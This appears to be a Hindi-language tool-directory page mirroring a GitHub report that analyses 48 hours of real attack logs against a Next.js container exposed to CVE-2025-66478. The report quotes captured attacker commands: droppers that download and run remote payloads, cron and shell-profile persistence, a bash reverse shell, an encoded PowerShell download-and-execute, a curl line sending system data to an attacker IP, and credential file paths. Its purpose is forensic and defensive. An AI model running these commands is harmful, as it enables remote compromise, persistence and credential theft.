Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-66478 — CVE-2025-66478 (Next.js Server Actions RCE) के वास्तविक दुनिया के हमले के लॉग विश्लेषण, मैलवेयर नमूनों, हमलावर IP ट्रैकिंग, और कंटेनर सुरक्षा सख्तीकरण के सबक के साथ। | Kitploit
उपकरण/GitHubGitHub/exptechtw/cve-2025-66478
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणफोरेंसिकमालवेयर विश्लेषणखतरा खुफियालर्निंग और शिक्षाघटना प्रतिक्रिया
GitHubexptechtw/cve-2025-66478

CVE-2025-66478

CVE-2025-66478 (Next.js Server Actions RCE) के वास्तविक दुनिया के हमले के लॉग विश्लेषण, मैलवेयर नमूनों, हमलावर IP ट्रैकिंग, और कंटेनर सुरक्षा सख्तीकरण के सबक के साथ।

2119 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

CVE-2025-66478 - Next.js सर्वर कार्रवाइयाँ RCE शोषण वास्तविक हमला लॉग विश्लेषण

अवलोकन

यह परियोजना इंटरनेट पर उजागर Next.js 15.1.2 एप्लिकेशन (Docker कंटेनर में चल रहा) द्वारा रिकॉर्ड किए गए वास्तविक हमला लॉग एकत्र करती है। ये लॉग दिखाते हैं कि CVE-2025-66478 भेद्यता का बड़े पैमाने पर स्वचालित हमला उपकरणों द्वारा स्कैनिंग और शोषण किया जा रहा है।

रिकॉर्ड समय सीमा: 2025-12-04 ~ 2025-12-06 (लगभग 48 घंटे)

पर्यावरण जानकारी:

  • फ्रेमवर्क: Next.js 15.1.2
  • रनटाइम: Bun v1.2.20
  • कंटेनर: Docker (Alpine Linux)
  • समय क्षेत्र: Asia/Taipei

हमला प्रकार सांख्यिकी

1. दुर्भावनापूर्ण प्रोग्राम डाउनलोड और निष्पादन (Dropper/Downloader)

हमलावर भेद्यता के माध्यम से दुर्भावनापूर्ण प्रोग्राम डाउनलोड और निष्पादित करने के निर्देश देने का प्रयास करते हैं।

हमला स्रोत IPदुर्भावनापूर्ण पेलोड URLविवरण
216.158.232.43http://216.158.232.43:12000/sex.shबॉटनेट/माइनिंग प्रोग्राम
38.207.161.212http://38.207.161.212/agentदुर्भावनापूर्ण एजेंट प्रोग्राम
43.156.63.124http://43.156.63.124/tsdक्रॉन बैकडोर डालना
154.38.121.219res.qiqigece.top/nginx3nginx का रूप धारण करने वाला दुर्भावनापूर्ण प्रोग्राम
47.79.42.91iot.632313373.xyz/nz.shIoT बॉटनेट स्क्रिप्ट
47.79.65.237sup001.oss-cn-hongkong.aliyuncs.com/python1.shमाइनिंग/बैकडोर प्रोग्राम
103.135.101.15http://103.135.101.15/wocaosinm.shदुर्भावनापूर्ण स्क्रिप्ट
38.12.24.231http://38.12.24.231/kworkerकर्नेल वर्कर का रूप धारण करने वाला दुर्भावनापूर्ण प्रोग्राम
128.199.194.97http://128.199.194.97:9001/setup2.shआरंभीकरण स्क्रिप्ट

हमला निर्देश उदाहरण

# विशिष्ट ड्रॉपर हमला
curl -fsSL http://38.207.161.212/agent -o /tmp/.a && chmod +x /tmp/.a && /tmp/.a

# क्रॉन स्थायित्व बैकडोर डालना
curl -s -o /etc/cron.hourly/tsd http://43.156.63.124/tsd && chmod +x /etc/cron.hourly/tsd

# जटिल स्थायित्व हमला (एकाधिक डाउनलोड विधियाँ + क्रॉन + bashrc)
u='http://38.12.24.231/kworker'; n='kworker';
for d in $HOME/.config/sys_monitor /tmp/.sys_monitor /dev/shm/.sys_monitor /var/tmp/.sys_monitor; do
  mkdir -p $d;
  if [ -w $d ]; then
    p="$d/$n";
    (curl -ks $u -o $p || wget -q --no-check-certificate $u -O $p || python3 -c "import urllib.request;urllib.request.urlretrieve('$u','$p')");
    chmod +x $p;
    nohup $p >/dev/null 2>&1 &
    (crontab -l 2>/dev/null | grep -v $n; echo "* * * * * $p >/dev/null 2>&1") | crontab -;
    echo "$p >/dev/null 2>&1 &" >> ~/.bashrc;
    echo "$p >/dev/null 2>&1 &" >> ~/.zshrc;
  fi;
done

2. रिवर्स शेल (Reverse Shell)

हमलावर इंटरैक्टिव एक्सेस प्राप्त करने के लिए रिवर्स शेल कनेक्शन स्थापित करने का प्रयास करते हैं।

# बैश रिवर्स शेल
bash -c "bash -i >& /dev/tcp/154.26.192.32/19899 0>&1"

3. PowerShell हमला (Windows के लिए गलत अनुमान)

हमलावर मानते हैं कि लक्ष्य Windows सिस्टम है और PowerShell निर्देश निष्पादित करने का प्रयास करते हैं।

# Base64 एन्कोडेड दुर्भावनापूर्ण PowerShell
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AMgAwADkALgAxADAAMwA6ADYAMwA5ADMAOAAvAG4AcgBDAHIAUQAnACkA

# डीकोड करने पर:
# IEX (New-Object System.Net.Webclient).DownloadString('http://156.234.209.103:63938/nrCrQ')

# भेद्यता पुष्टि के लिए गणितीय गणना
powershell -c "41*271"      # = 11111 (विशेषता कोड पुष्टि)
powershell -c "44225*41002" # = 1814113450

4. सूचना संग्रह (Information Gathering)

हमलावर बाद के हमलों के लिए सिस्टम जानकारी एकत्र करने का प्रयास करते हैं।

# सिस्टम जानकारी एकत्र करना और बाहर भेजना
curl http://38.60.212.106:8000/?data=`(hostname;ip addr show;id;ip route show;ip neigh show;route -n;cat /etc/passwd;hostname -I) | base64 -w 0`

5. क्रेडेंशियल चोरी (Credential Harvesting)

हमलावर विभिन्न संवेदनशील फ़ाइलों और क्रेडेंशियल्स को पढ़ने का प्रयास करते हैं।

पढ़ने का प्रयास किए गए संवेदनशील पथ

श्रेणीपथ
क्लाउड क्रेडेंशियल/root/.aws/credentials, /root/.aws/config
/root/.config/gcloud/credentials.db
/root/.config/gcloud/application_default_credentials
SSH कुंजी/root/.ssh/id_rsa, /root/.ssh/config
Git क्रेडेंशियल/root/.git-credentials, /root/.gitconfig
कंटेनर/K8s/root/.docker/config, /root/.kube/config
/var/lib/kubelet/config.yaml
एप्लिकेशन/proc/self/cwd/serviceAccountKey.json (Firebase)
/proc/self/cwd/prisma/.env, /proc/self/cwd/prisma/schema.prisma
शेल इतिहास/root/.bash_history, /root/.zsh_history
क्लाउड उपकरण/root/.ossutilconfig (Alibaba Cloud OSS)
/root/.npmrc
सिस्टम सेटिंग/etc/ansible/ansible.cfg, /etc/passwd, /etc/shadow

6. पर्यावरण चर रिसाव

भेद्यता के माध्यम से सफलतापूर्वक रिसाव किए गए कंटेनर पर्यावरण चर:

HOSTNAME=6973aeebae41
BUN_INSTALL_BIN=/usr/local/bin
HOME=/root
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/bun-node-fallback-bin
PWD=/app
TZ=Asia/Taipei
NODE_ENV=production
BUN_RUNTIME_TRANSPILER_CACHE_PATH=0

7. DNS बहिर्वाह (DNS Exfiltration)

हमलावर डेटा बाहर भेजने या भेद्यता की पुष्टि करने के लिए DNS क्वेरी का उपयोग करते हैं:

ping 5a58e4a0.log.dnslog.pp.ua.

हमला विफलता के कारण

अधिकांश हमले Alpine Linux कंटेनर की कम विशेषताओं के कारण विफल होते हैं:

गुम उपकरणप्रभाव
curlदुर्भावनापूर्ण पेलोड डाउनलोड करने में असमर्थ
bashबैश-विशिष्ट सिंटैक्स (जैसे रिवर्स शेल) निष्पादित करने में असमर्थ
powershellWindows हमला अप्रभावी
pythonPython डाउनलोडर का उपयोग करने में असमर्थ

हालांकि wget उपलब्ध है, लेकिन कुछ दुर्भावनापूर्ण स्क्रिप्ट आंतरिक रूप से curl या bash पर निर्भर करती हैं, जिससे निष्पादन विफल हो जाता है।


Base64 डीकोडिंग उदाहरण

लॉग में बड़ी मात्रा में Base64 एन्कोडेड डेटा शामिल है, यहाँ कुछ डीकोडिंग परिणाम हैं:

सिस्टम जानकारी रिसाव

# digest: 'cm9vdAo='
डीकोड: root

# digest: 'dGVzdAo='
डीकोड: test

# digest: 'dnVsbmVyYWJpbGl0eV90ZXN0Cg=='
डीकोड: vulnerability_test

# digest: 'dWlkPTAocm9vdCkgZ2lkPTAocm9vdCkgZ3JvdXBzPTAocm9vdCksMShiaW4pLDIoZGFlbW9uKSwzKHN5cyksNChhZG0pLDYoZGlzayksMTAod2hlZWwpLDExKGZsb3BweSksMjAoZGlhbG91dCksMjYodGFwZSksMjcodmlkZW8pCg=='
डीकोड: uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

निर्देशिका सूची रिसाव

# /tmp निर्देशिका सामग्री
dG90YWwgMjAKZHJ3eHJ3eHJ3dCAgICAxIHJvb3QgICAgIHJvb3QgICAgICAgICAgNDA5NiBEZWMgIDUgMTg6MDAgLgpkcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA0MDk2IERlYyAgNCAxMzozNiAuLgotcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA5ODQ4IERlYyAgNSAxODowMCBJTlNUQUxMCg==

डीकोड:
total 20
drwxrwxrwt    1 root     root          4096 Dec  5 18:00 .
drwxr-xr-x    1 root     root          4096 Dec  4 13:36 ..
-rwxr-xr-x    1 root     root          9848 Dec  5 18:00 INSTALL

हमला स्रोत IP सांख्यिकी

यहाँ रिकॉर्ड किए गए हमला स्रोत IP पतों की सूची है:

टूल डाउनलोड करें